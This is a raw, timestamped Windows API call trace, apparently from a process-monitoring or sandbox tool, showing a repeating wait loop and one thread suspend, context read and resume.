[0223.879] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0223.879] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0223.879] SetEvent (hEvent=0xec) returned 1 [0223.879] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0223.887] timeEndPeriod (uPeriod=0x1) returned 0x0 [0223.887] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0225.378] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0225.378] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0225.378] SetEvent (hEvent=0xec) returned 1 [0225.378] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0225.385] timeEndPeriod (uPeriod=0x1) returned 0x0 [0225.385] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0227.629] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0227.629] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0227.630] SetEvent (hEvent=0xec) returned 1 [0227.630] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0227.666] timeEndPeriod (uPeriod=0x1) returned 0x0 [0227.667] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0229.386] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0229.386] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0229.386] SetEvent (hEvent=0xec) returned 1 [0229.386] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0229.401] timeEndPeriod (uPeriod=0x1) returned 0x0 [0229.403] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0230.735] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0230.736] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0230.736] SetEvent (hEvent=0xec) returned 1 [0230.736] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0230.750] timeEndPeriod (uPeriod=0x1) returned 0x0 [0230.751] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0232.029] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0232.029] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0232.029] SetEvent (hEvent=0xec) returned 1 [0232.030] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0232.041] timeEndPeriod (uPeriod=0x1) returned 0x0 [0232.041] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0234.564] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0234.564] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0234.564] SetEvent (hEvent=0xec) returned 1 [0234.564] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0234.601] timeEndPeriod (uPeriod=0x1) returned 0x0 [0234.601] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0235.743] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0235.743] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0235.743] SetEvent (hEvent=0xec) returned 1 [0235.743] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0235.761] timeEndPeriod (uPeriod=0x1) returned 0x0 [0235.761] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0236.746] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0236.746] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0236.748] SetEvent (hEvent=0xec) returned 1 [0236.748] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0236.760] timeEndPeriod (uPeriod=0x1) returned 0x0 [0236.760] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0237.715] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0237.715] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0237.715] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x80, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2788f928, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2788f928*=0xf8) returned 1 [0237.715] SuspendThread (hThread=0xf8) returned 0x0 [0237.715] GetThreadContext (in: hThread=0xf8, lpContext=0x2788f940 | out: lpContext=0x2788f940*(P1Home=0x0, P2Home=0x0, P3Home=0x0, P4Home=0x0, P5Home=0x0, P6Home=0x0, ContextFlags=0x100001, MxCsr=0x0, SegCs=0x33, SegDs=0x0, SegEs=0x0, SegFs=0x0, SegGs=0x0, SegSs=0x2b, EFlags=0x10202, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, Rax=0x0, Rcx=0x0, Rdx=0x0, Rbx=0x0, Rsp=0x22fc88, Rbp=0x0, Rsi=0x0, Rdi=0x0, R8=0x0, R9=0x0, R10=0x0, R11=0x0, R12=0x0, R13=0x0, R14=0x0, R15=0x0, Rip=0x42797b, FltSave.ControlWord=0x0, FltSave.StatusWord=0x0, FltSave.TagWord=0x0, FltSave.Reserved1=0x0, FltSave.ErrorOpcode=0x0, FltSave.ErrorOffset=0x0, FltSave.ErrorSelector=0x0, FltSave.Reserved2=0x0, FltSave.DataOffset=0x0, FltSave.DataSelector=0x0, FltSave.Reserved3=0x0, FltSave.MxCsr=0x0, FltSave.MxCsr_Mask=0x0, FltSave.FloatRegisters.Low=0x0, FltSave.FloatRegisters.High=0x0, FltSave.XmmRegisters.Low=0x0, FltSave.XmmRegisters.High=0x0, FltSave.Reserved4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0), FltSave.StackControl=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0), FltSave.Cr0NpxState=0x0, Header.Low=0x0, Header.High=0x0, Legacy.Low=0x0, Legacy.High=0x0, Xmm0.Low=0x0, Xmm0.High=0x0, Xmm1.Low=0x0, Xmm1.High=0x0, Xmm2.Low=0x0, Xmm2.High=0x0, Xmm3.Low=0x0, Xmm3.High=0x0, Xmm4.Low=0x0, Xmm4.High=0x0, Xmm5.Low=0x0, Xmm5.High=0x0, Xmm6.Low=0x0, Xmm6.High=0x0, Xmm7.Low=0x0, Xmm7.High=0x0, Xmm8.Low=0x0, Xmm8.High=0x0, Xmm9.Low=0x0, Xmm9.High=0x0, Xmm10.Low=0x0, Xmm10.High=0x0, Xmm11.Low=0x0, Xmm11.High=0x0, Xmm12.Low=0x0, Xmm12.High=0x0, Xmm13.Low=0x0, Xmm13.High=0x0, Xmm14.Low=0x0, Xmm14.High=0x0, Xmm15.Low=0x0, Xmm15.High=0x0, VectorRegister.Low=0x0, VectorRegister.High=0x0, VectorControl=0x0, DebugControl=0x0, LastBranchToRip=0x0, LastBranchFromRip=0x0, LastExceptionToRip=0x0, LastExceptionFromRip=0x0)) returned 1 [0237.718] ResumeThread (hThread=0xf8) returned 0x1 [0237.718] CloseHandle (hObject=0xf8) returned 1 [0237.718] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0237.725] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0237.725] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0237.740] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0237.740] SetEvent (hEvent=0xec) returned 1 [0237.740] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0237.741] timeEndPeriod (uPeriod=0x1) returned 0x0 [0237.741] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0238.021] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0238.021] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0238.021] SetEvent (hEvent=0xec) returned 1 [0238.022] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0238.024] timeEndPeriod (uPeriod=0x1) returned 0x0 [0238.024] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0239.065] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0239.065] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0239.065] SetEvent (hEvent=0xec) returned 1 [0239.065] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0239.072] timeEndPeriod (uPeriod=0x1) returned 0x0 [0239.072] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0239.098] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0239.098] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0239.098] SetEvent (hEvent=0xec) returned 1 [0239.098] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0239.103] timeEndPeriod (uPeriod=0x1) returned 0x0 [0239.103] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0240.091] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0240.091] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0240.091] SetEvent (hEvent=0xec) returned 1 [0240.091] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0240.126] timeEndPeriod (uPeriod=0x1) returned 0x0 [0240.126] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0240.261] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0240.261] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0240.261] SetEvent (hEvent=0xec) returned 1 [0240.261] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0240.296] timeEndPeriod (uPeriod=0x1) returned 0x0 [0240.296] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0242.620] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0242.620] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0242.620] SetEvent (hEvent=0xec) returned 1 [0242.620] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0242.656] timeEndPeriod (uPeriod=0x1) returned 0x0 [0242.656] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0243.620] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0243.620] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0243.620] SetEvent (hEvent=0xec) returned 1 [0243.620] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0243.655] timeEndPeriod (uPeriod=0x1) returned 0x0 [0243.655] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0244.713] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0244.713] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0244.713] SetEvent (hEvent=0xec) returned 1 [0244.713] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0244.789] timeEndPeriod (uPeriod=0x1) returned 0x0 [0244.789] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0245.661] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0245.661] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0245.661] SetEvent (hEvent=0xec) returned 1 [0245.661] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0245.697] timeEndPeriod (uPeriod=0x1) returned 0x0 [0245.697] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0247.188] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0247.188] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0247.189] SetEvent (hEvent=0xec) returned 1 [0247.189] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0247.223] timeEndPeriod (uPeriod=0x1) returned 0x0 [0247.223] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0248.178] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0248.178] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0248.179] SetEvent (hEvent=0xec) returned 1 [0248.179] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0248.214] timeEndPeriod (uPeriod=0x1) returned 0x0 [0248.214] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0249.113] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0249.113] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0249.113] SetEvent (hEvent=0xec) returned 1 [0249.113] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0249.148] timeEndPeriod (uPeriod=0x1) returned 0x0 [0249.148] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0250.133] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0250.133] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0250.133] SetEvent (hEvent=0xec) returned 1 [0250.133] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0250.230] timeEndPeriod (uPeriod=0x1) returned 0x0 [0250.230] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0251.152] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0251.152] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0251.152] SetEvent (hEvent=0xec) returned 1 [0251.152] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0251.178] timeEndPeriod (uPeriod=0x1) returned 0x0 [0251.178] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0251.245] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0251.245] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0251.245] SetEvent (hEvent=0xec) returned 1 [0251.245] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0251.262] timeEndPeriod (uPeriod=0x1) returned 0x0 [0251.262] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0253.191] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0253.191] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0253.200] SetEvent (hEvent=0xec) returned 1 [0253.205] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0253.225] timeEndPeriod (uPeriod=0x1) returned 0x0 [0253.226] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0254.612] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0254.612] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0254.612] SetEvent (hEvent=0xec) returned 1 [0254.612] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0254.648] timeEndPeriod (uPeriod=0x1) returned 0x0 [0254.648] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0255.745] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0255.745] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0255.745] SetEvent (hEvent=0xec) returned 1 [0255.745] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0255.783] timeEndPeriod (uPeriod=0x1) returned 0x0 [0255.783] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0256.787] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0256.787] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0256.787] SetEvent (hEvent=0xec) returned 1 [0256.787] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0256.823] timeEndPeriod (uPeriod=0x1) returned 0x0 [0256.823] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0257.770] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0257.770] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0257.770] SetEvent (hEvent=0xec) returned 1 [0257.770] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0257.808] timeEndPeriod (uPeriod=0x1) returned 0x0 [0257.808] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0259.173] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0259.173] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0259.173] SetEvent (hEvent=0xec) returned 1 